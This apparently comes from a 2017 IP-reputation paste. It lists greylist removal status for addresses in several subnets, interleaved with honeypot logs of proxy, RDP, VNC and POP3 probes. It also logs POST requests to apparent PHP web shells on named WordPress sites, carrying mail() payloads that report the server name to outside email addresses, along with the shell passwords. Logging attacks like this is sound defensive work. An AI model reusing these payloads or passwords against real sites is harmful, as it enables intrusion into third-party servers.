
Untitled

a guest
Mar 15th, 2017
  1. 5.45.64.0/24
  2. 5.45.64.14: removed
  3. 5.45.64.20: removed
  4. 5.45.64.32: removed
  5. 5.45.64.39: removed
  6. 5.45.64.92: removed
  7. 5.45.64.228: removed
  8.  
  9. 5.45.64.161: Recent logs:
  10. Date: 2017-03-06 16:36:06
  11. Attacker ip: 5.45.64.161
  12. {
  13. "PORT HIT": "5.45.64.161:35226->89.33.5.34:1080",
  14. "MESSAGES": "Array
  15. (
  16. [17:34:42] => GET http://cdnjs.cloudflare.com/ajax/libs/6px/1.0.3/6px.min.js HTTP/1.1
  17. Host: cdnjs.cloudflare.com
  18. User-Agent: Go-http-client/1.1
  19. Accept-Encoding: gzip
  20.  
  21.  
  22. )
  23. "
  24. }
  25. Date: 2017-03-06 16:35:23
  26. Attacker ip: 5.45.64.161
  27. {
  28. "PORT HIT": "5.45.64.161:49206->178.79.134.254:1080"
  29. }
  30. Date: 2017-03-06 16:16:40
  31. Attacker ip: 5.45.64.161
  32. {
  33. "PORT HIT": "5.45.64.161:55544->89.33.5.60:1080",
  34. "MESSAGES": "Array
  35. (
  36. [17:15:44] => GET http://cdnjs.cloudflare.com/ajax/libs/6px/1.0.3/6px.min.js HTTP/1.1
  37. Host: cdnjs.cloudflare.com
  38. User-Agent: Go-http-client/1.1
  39. Accept-Encoding: gzip
  40.  
  41.  
  42. )
  43. "
  44. }
  45. Date: 2017-03-06 15:57:35
  46. Attacker ip: 5.45.64.161
  47. {
  48. "PORT HIT": "5.45.64.161:35756->89.33.5.53:1080",
  49. "MESSAGES": "Array
  50. (
  51. [16:56:11] => GET http://cdnjs.cloudflare.com/ajax/libs/6px/1.0.3/6px.min.js HTTP/1.1
  52. Host: cdnjs.cloudflare.com
  53. User-Agent: Go-http-client/1.1
  54. Accept-Encoding: gzip
  55.  
  56.  
  57. )
  58. "
  59. }
  60. Date: 2017-03-06 15:56:48
  61. Attacker ip: 5.45.64.161
  62. {
  63. "PORT HIT": "5.45.64.161:42606->113.52.133.234:1080"
  64. }
  65. Date: 2017-03-06 15:38:12
  66. Attacker ip: 5.45.64.161
  67. {
  68. "PORT HIT": "5.45.64.161:34590->51.255.53.224:1080",
  69. "MESSAGES": "Array
  70. (
  71. [09:40:33] => GET http://cdnjs.cloudflare.com/ajax/libs/6px/1.0.3/6px.min.js HTTP/1.1
  72. Host: cdnjs.cloudflare.com
  73. User-Agent: Go-http-client/1.1
  74. Accept-Encoding: gzip
  75.  
  76.  
  77. )
  78. "
  79. }
  80. Date: 2017-03-06 15:37:44
  81. Attacker ip: 5.45.64.161
  82. {
  83. "PORT HIT": "5.45.64.161:41884->178.32.99.247:1080",
  84. "MESSAGES": "Array
  85. (
  86. [09:32:40] => GET http://cdnjs.cloudflare.com/ajax/libs/6px/1.0.3/6px.min.js HTTP/1.1
  87. Host: cdnjs.cloudflare.com
  88. User-Agent: Go-http-client/1.1
  89. Accept-Encoding: gzip
  90.  
  91.  
  92. )
  93. "
  94. }
  95. Date: 2017-03-06 15:37:39
  96. Attacker ip: 5.45.64.161
  97. {
  98. "PORT HIT": "5.45.64.161:48624->192.168.0.54:1080",
  99. "MESSAGES": "Array
  100. (
  101. [14:33:25] => GET http://cdnjs.cloudflare.com/ajax/libs/6px/1.0.3/6px.min.js HTTP/1.1
  102. Host: cdnjs.cloudflare.com
  103. User-Agent: Go-http-client/1.1
  104. Accept-Encoding: gzip
  105. 5.45.67.0/24
  106. 5.45.67.5: removed
  107. 5.45.67.80: removed
  108. 5.45.70.0/24
  109. 5.45.70.73:
  110. Date: 2017-02-05 18:50:46
  111. Attacker ip: 5.45.70.73
  112. {
  113. "ip": "5.45.70.73",
  114. "listname": "openbl_1days",
  115. "listlink": "https://www.openbl.org/lists/base_1days.txt"
  116. }
  117. 5.45.70.75: removed
  118. 5.45.70.94: removed
  119. 5.45.70.108: we saw a large number of GHH port hits from this IP
  120. 5.45.72.0/24
  121. 5.45.72.29:
  122. Date: 2017-02-27 22:09:28
  123. Attacker ip: 5.45.72.29
  124. {
  125. "PORT HIT": "5.45.72.29:52984->23.239.77.95:3389",
  126. "MESSAGES": "Array
  127. (
  128. [17:03:52] => \u0003\u0000\u0000+&à\u0000\u0000\u0000\u0000\u0000Cookie: mstshash=hello
  129. \u0001\u0000\b\u0000\u0003\u0000\u0000\u0000
  130. )
  131. "
  132. }
  133. Date: 2017-02-27 22:09:27
  134. Attacker ip: 5.45.72.29
  135. {
  136. "PORT HIT": "5.45.72.29:52983->23.239.77.93:3389",
  137. "MESSAGES": "Array
  138. (
  139. [17:03:52] => \u0003\u0000\u0000+&à\u0000\u0000\u0000\u0000\u0000Cookie: mstshash=hello
  140. \u0001\u0000\b\u0000\u0003\u0000\u0000\u0000
  141. )
  142. "
  143. }
  144. Date: 2017-02-27 22:09:27
  145. Attacker ip: 5.45.72.29
  146. {
  147. "PORT HIT": "5.45.72.29:52982->23.239.77.92:3389",
  148. "MESSAGES": "Array
  149. (
  150. [17:03:52] => \u0003\u0000\u0000+&à\u0000\u0000\u0000\u0000\u0000Cookie: mstshash=hello
  151. \u0001\u0000\b\u0000\u0003\u0000\u0000\u0000
  152. 5.45.72.39: removed
  153. 5.45.75.0/24
  154. 5.45.75.2:
  155. Date: 2017-03-12 14:15:17
  156. Attacker ip: 5.45.75.2
  157. {
  158. "PORT HIT": "5.45.75.2:35242->37.235.1.96:110",
  159. "MESSAGES": "Array
  160. (
  161. [14:09:46] => USER sexual.sexual@everymail.net
  162.  
  163. [14:09:46+1] => QUIT
  164.  
  165. )
  166. "
  167. }
  168. Date: 2017-03-12 05:43:27
  169. Attacker ip: 5.45.75.2
  170. {
  171. "PORT HIT": "5.45.75.2:55893->37.235.1.96:110",
  172. "MESSAGES": "Array
  173. (
  174. [05:35:58] => USER showboat@everymail.net
  175.  
  176. [05:35:58+1] => QUIT
  177.  
  178. )
  179. "
  180. }
  181. Date: 2017-03-11 17:13:56
  182. Attacker ip: 5.45.75.2
  183. {
  184. "PORT HIT": "5.45.75.2:36460->5.63.147.236:110",
  185. "MESSAGES": "Array
  186. (
  187. [16:08:01] => USER kurt_castilloae@100-biker.co.uk
  188.  
  189. [16:08:01+1] => QUIT
  190.  
  191. )
  192. "
  193. }
  194. Date: 2017-03-11 01:43:01
  195. Attacker ip: 5.45.75.2
  196. {
  197. "PORT HIT": "5.45.75.2:52421->84.2.35.144:110",
  198. "MESSAGES": "Array
  199. (
  200. [01:41:59] => USER aloksa@loksacel.hu
  201.  
  202. [01:41:59+1] => QUIT
  203.  
  204. 5.45.75.24: not able to remove it from the greylist.
  205. 5.45.75.28: removed
  206. 5.45.75.41: removed
  207. 5.45.75.49: removed
  208. 5.45.76.0/24
  209. 5.45.76.15:
  210. Date: 2017-03-02 19:01:46
  211. Victim domain: www.anodizadosbp.com
  212. Attacker ip: 5.45.76.15
  213. Url: [www.anodizadosbp.com/wp-content/themes/twentytwelve/contact.php]
  214. Agent: [Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36]
  215. Post data: [Array
  216. (
  217. [a] => Php
  218. [c] =>
  219. [p1] =>
  220. $to = "intronet1337@gmail.com";
  221. mail($to, "Hello from ".$_SERVER['SERVER_NAME'], "Hello there! How do you do?");
  222.  
  223. $to = "timur.mamoedov@yandex.ru";
  224. mail($to, "Hello from ".$_SERVER['SERVER_NAME'], "Hello there! How do you do?");
  225.  
  226. [p2] =>
  227. [p3] =>
  228. [charset] => UTF-8
  229. [pass] => jgOoo1skw2a_
  230. )
  231. ]
  232. Date: 2017-03-02 18:49:37
  233. Victim domain: www.chintannipale.com
  234. Attacker ip: 5.45.76.15
  235. Url: [www.chintannipale.com/wp-content/db_info.class.php]
  236. Agent: [Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36]
  237. Post data: [Array
  238. (
  239. [a] => Php
  240. [c] =>
  241. [p1] =>
  242. $to = "intronet1337@gmail.com";
  243. mail($to, "Hello from ".$_SERVER['SERVER_NAME'], "Hello there! How do you do?");
  244.  
  245. $to = "timur.mamoedov@yandex.ru";
  246. mail($to, "Hello from ".$_SERVER['SERVER_NAME'], "Hello there! How do you do?");
  247.  
  248. [p2] =>
  249. [p3] =>
  250. [charset] => UTF-8
  251. [pass] => ryfgddjs1
  252. )
  253. ]
  254. Date: 2017-03-02 18:49:36
  255. Victim domain: www.absbe.com
  256. Attacker ip: 5.45.76.15
  257. Url: [www.absbe.com/wp-content/common.php]
  258. Agent: [Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36]
  259. Post data: [Array
  260. (
  261. [a] => Php
  262. [c] =>
  263. [p1] =>
  264. $to = "intronet1337@gmail.com";
  265. mail($to, "Hello from ".$_SERVER['SERVER_NAME'], "Hello there! How do you do?");
  266.  
  267. $to = "timur.mamoedov@yandex.ru";
  268. mail($to, "Hello from ".$_SERVER['SERVER_NAME'], "Hello there! How do you do?");
  269.  
  270. [p2] =>
  271. [p3] =>
  272. [charset] => UTF-8
  273. [pass] => nbJK@SHN2
  274. )
  275. ]
  276. Date: 2017-03-02 18:49:27
  277. Victim domain: www.davidbillis.net
  278. Attacker ip: 5.45.76.15
  279. Url: [www.davidbillis.net/wp-los.php]
  280. Agent: [Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36]
  281. Post data: [Array
  282. (
  283. [a] => Php
  284. [c] =>
  285. [p1] =>
  286. $to = "intronet1337@gmail.com";
  287. mail($to, "Hello from ".$_SERVER['SERVER_NAME'], "Hello there! How do you do?");
  288.  
  289. $to = "timur.mamoedov@yandex.ru";
  290. mail($to, "Hello from ".$_SERVER['SERVER_NAME'], "Hello there! How do you do?");
  291.  
  292. [p2] =>
  293. [p3] =>
  294. [charset] => UTF-8
  295. [pass] => jgOoo1skw2a_
  296. )
  297. ]
  298. Date: 2017-03-02 18:49:25
  299. Victim domain: www.chambreavecvie.com
  300. Attacker ip: 5.45.76.15
  301. Url: [www.chambreavecvie.com/setting.php]
  302. Agent: [Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36]
  303. Post data: [Array
  304. (
  305. [a] => Php
  306. [c] =>
  307. [p1] =>
  308. $to = "intronet1337@gmail.com";
  309. mail($to, "Hello from ".$_SERVER['SERVER_NAME'], "Hello there! How do you do?");
  310.  
  311. $to = "timur.mamoedov@yandex.ru";
  312. mail($to, "Hello from ".$_SERVER['SERVER_NAME'], "Hello there! How do you do?");
  313.  
  314. [p2] =>
  315. [p3] =>
  316. [charset] => UTF-8
  317. [pass] => 8I5Ra7z2LaSinfQ
  318. )
  319. ]
  320. Date: 2017-03-02 16:04:36
  321. Victim domain: www.bratanis.org
  322. Attacker ip: 5.45.76.15
  323. Url: [www.bratanis.org/conter.php]
  324. Agent: [Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36]
  325. Post data: [Array
  326. (
  327. [a] => Php
  328. [c] =>
  329. [p1] =>
  330. $to = "intronet1337@gmail.com";
  331. mail($to, "Hello from ".$_SERVER['SERVER_NAME'], "Hello there! How do you do?");
  332.  
  333. $to = "timur.mamoedov@yandex.ru";
  334. mail($to, "Hello from ".$_SERVER['SERVER_NAME'], "Hello there! How do you do?");
  335.  
  336. [p2] =>
  337. [p3] =>
  338. [charset] => UTF-8
  339. [pass] => jgOoo1skw2a_
  340. )
  341. ]
  342. 5.45.76.44: removed
  343. 5.45.76.53: removed
  344. 5.45.76.229: removed
  345. 5.45.77.0/24
  346. 5.45.77.6: not able to remove
  347. 5.45.77.30: removed
  348. 5.45.77.40: was only on the user greylist, but has been removed from it
  349. 5.45.77.78: removed
  350. 5.45.84.0/24: isn't in the greylist
  351. 37.1.202.0/24
  352. 37.1.202.31: not able to remove
  353. 37.1.202.44: removed
  354. 37.1.202.83: it is only on the user greylist:
  355. Date: 2017-03-08 13:28:26
  356. Attacker ip: 37.1.202.83
  357. {
  358. "PORT HIT": "37.1.202.83:63254->72.29.77.55:3389",
  359. "MESSAGES": "Array
  360. (
  361. [07:20:39] => \u0003\u0000\u0000+&à\u0000\u0000\u0000\u0000\u0000Cookie: mstshash=hello
  362. \u0001\u0000\b\u0000\u0003\u0000\u0000\u0000
  363. )
  364. "
  365. }
  366. Date: 2017-03-08 13:28:24
  367. Attacker ip: 37.1.202.83
  368. {
  369. "PORT HIT": "37.1.202.83:56715->72.29.66.61:3389",
  370. "MESSAGES": "Array
  371. (
  372. [07:20:32] => \u0003\u0000\u0000+&à\u0000\u0000\u0000\u0000\u0000Cookie: mstshash=hello
  373. \u0001\u0000\b\u0000\u0003\u0000\u0000\u0000
  374. )
  375. "
  376. }
  377. 37.1.202.93: removed
  378. 37.1.202.200:
  379. Date: 2017-03-10 18:32:07
  380. Attacker ip: 37.1.202.200
  381. {
  382. "PORT HIT": "37.1.202.200:39870->89.248.172.104:5900"
  383. }
  384. Date: 2017-03-10 13:34:42
  385. Attacker ip: 37.1.202.200
  386. {
  387. "PORT HIT": "37.1.202.200:54920->185.127.128.5:5900"
  388. }
  389. Date: 2017-03-09 12:44:12
  390. Attacker ip: 37.1.202.200
  391. {
  392. "PORT HIT": "37.1.202.200:50440->37.97.220.160:5900"
  393. }
  394. Date: 2017-03-09 06:57:01
  395. Attacker ip: 37.1.202.200
  396. {
  397. "PORT HIT": "37.1.202.200:42278->91.227.204.247:5666"
  398. }
  399. Date: 2017-03-09 06:41:50
  400. Attacker ip: 37.1.202.200
  401. {
  402. "PORT HIT": "37.1.202.200:45080->84.2.35.129:5900"
  403. }
  404. Date: 2017-03-09 06:36:33
  405. Attacker ip: 37.1.202.200
  406. {
  407. "PORT HIT": "37.1.202.200:48006->185.127.128.5:5900"
  408. }
  409. Date: 2017-03-08 21:50:39
  410. Attacker ip: 37.1.202.200
  411. {
  412. "PORT HIT": "37.1.202.200:35250->91.227.204.21:5666"
  413. }
  414. Date: 2017-03-08 19:59:38
  415. Attacker ip: 37.1.202.200
  416. {
  417. "PORT HIT": "37.1.202.200:39376->89.248.172.104:5900"
  418. }
  419. 37.1.202.225: not able to remove
  420. 37.1.202.240: was only on user greylist, but removed from it
  421. 37.1.202.253: removed
  422. 37.1.205.0/24
  423. 37.1.205.86: not able to remove
  424. 37.1.205.87: was only on user greylist, but removed from it
  425. 37.1.205.91: removed
  426. 37.1.206.0/24
  427. 37.1.206.8: not able to remove
  428. 37.1.206.114: was only on user greylist, but removed from it